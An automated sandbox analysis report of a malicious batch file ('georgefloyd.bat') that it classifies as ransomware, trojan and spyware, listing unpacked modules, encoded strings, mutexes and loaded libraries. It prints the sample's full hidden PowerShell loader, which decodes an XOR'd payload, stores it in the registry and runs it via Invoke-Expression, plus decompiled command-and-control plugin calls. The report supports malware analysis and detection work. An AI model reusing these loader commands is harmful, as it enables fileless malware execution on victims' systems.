Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSchedulerSnapshot.cs	Task registration methods: 'InternalCreate', 'Create'
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AssemblyLoader.cs	Base64 encoded string: 'UVAbWFxWR1pGWlNBG0JcWwYHG0FURl5GVl1QUUBZUEcbR1BGWkBHVlBG', 'W08TUFReT1JOUltJE0pUUw4PE0lcTlZOXlVYWUhRWE8TT1hOUkhPXlhO', 'NDgkIyIlNnkxJXk6PjQlOCQ4MSN5ID45ZGV5IzYkPCQ0PzIzIjsyJXklMiQ4IiU0MiR5Mzs7eTQ4OiclMiQkMjM=', 'Jys3MDE2JWotMGopLSc2KzcrIjBqMy0qd3ZqMCU3LzcnLCEgMSghNmo2ITcrMTYnITdqICgoaicrKTQ2ITc3ISA=', 'Jys3MDE2JWouJWopLSc2KzcrIjBqMy0qd3ZqMCU3LzcnLCEgMSghNmo2ITcrMTYnITdqICgoaicrKTQ2ITc3ISA=', 'SUVZXl9YSwRYXwRHQ0lYRVlFTF4EXUNEGRgEXktZQVlJQk9OX0ZPWARYT1lFX1hJT1kETkZGBElFR1pYT1lZT04=', 'PThgIyctPCE9ISg6YDknIH18YDovPSU9LSYrKjsiKzxgPCs9ITs8LSs9', 'NTklIiMkN3giJHg7PzUkOSU5MCJ4IT84ZWR4IjclPSU1PjMyIzozJHgkMyU5IyQ1MyV4Mjo6eDU5OyYkMyUlMzI=', 'W1dLTE1KWRZCUBVbVhZVUVtKV0tXXkwWT1FWCwoWTFlLU0tbUF1cTVRdShZKXUtXTUpbXUsWXFRUFltXVUhKXUtLXVw=', 'IDJ3Mjs0LnQ3MzkoNSk1PC50LTM0aWh0LjspMSk5Mj8+LzY/KHQoPyk1Lyg5Pyk='
Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.cs	Base64 encoded string: 'ICBlaGxpYWh+fi19Ynpof35laGFhI2h1aC0gemRjaWJ6fnl0YWgtZWRpaWhjLSBobi0=', 'TWVid3FzZEs2ZWJ3cXNkNn53ZTZ0c3N4NnBjenpvNnp5d3Jzcg=='
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Settings.cs	Base64 encoded string: 'WC90e2vpmiam8pDcoIMG1kaztbDVLq5uoy9zc6lnsHeiDFVidWVI+kgo7tAch24i'
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Settings.cs	Base64 encoded string: 'WC90e2vpmiam8pDcoIMG1kaztbDVLq5uoy9zc6lnsHeiDFVidWVI+kgo7tAch24i'

Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winBAT@6/10@1/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\wwD0bshguVCRSd3k
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okd4b1um.ppc.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 \| Invoke-Expression"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 \| Invoke-Expression"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: georgefloyd.bat

Static file information: File size 4474706 > 1048576

Source:	Binary string: <>c__DisplayClass6_0<>9__0<Main>b__0IEnumerable`1List`1ReadInt32Dictionary`2ReadInt16get_UTF8<Module>CreateFileAGetUACPAGE_EXECUTE_READWRITEQxwgIQJtuynihFkPbNFN<>OMODULEINFOSystem.IOAESbavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkUJmjvFFFlvXCosturacostura.metadatamscorlibSystem.Collections.GenericsrcReadThreadLoadGetPayloadAddAesManagedisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.ja.microsoft.win32.taskscheduler.resources.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.tr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.sv.microsoft.win32.taskscheduler.resources.dll.compressedisElevatedEncodeCommandGetMethodsubscribeReplaceTaskServiceGetResourceset_ModeshareModePaddingModeCompressionModeCipherModeget_UnicodeSizeOfImageget_MessageExchangenullCacheInvokeEnumerableIDisposableGetModuleHandleCloseHandlehandletemplateFileMapViewOfFilefileIsInRoleWindowsBuiltInRoleConsolehModulemoduleget_NameprocNameGetAssemblyResourceNamelpFileNamefileNamemoduleNameget_FullNamefullNameGetNamerequestedAssemblyNamenameReadLineWriteLineValueTypeGetTypeSystem.CorecultureMethodBaseDisposeElevateWriteCompilerGeneratedAttributeGuidAttributeUnverifiableCodeAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeReadByte_GetConfigValueTryGetValueadd_AssemblyResolveget_SizedwSizesizePyramid.Phantom.Stager.ConfigconfigSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningCreateFileMappingFromBase64StringToBase64StringCultureToStringGetStringAttachmaximumSizeHighfileOffsetHighget_LengthEndsWithnullCacheLockTransformFinalBlockUnhookNewTaskFiTaMpiODlMarshalSystem.Security.Principalget_PrincipalTaskPrincipalWindowsPrincipalset_RunLevelTaskRunLevelBaseOfDllUnhookDllkernel32.dllpsapi.dllmsvcrt.dllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemOperatingSystemSymmetricAlgorithmICryptoTransformset_HiddenMainAppDomainget_CurrentDomainget_OSVersionget_VersionFodyVersionSystem.IO.CompressionGetModuleInformationdestinationSystem.GlobalizationExecActionSystem.ReflectionActionCollectionTriggerCollectionRegisterTaskDefinitionset_PositioncreationDispositionExceptionS
Source:	Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed8 source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|806F4C19B2D7FD9E3B836269EC07647019A29E95\|7960 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	.Net Code: Memory
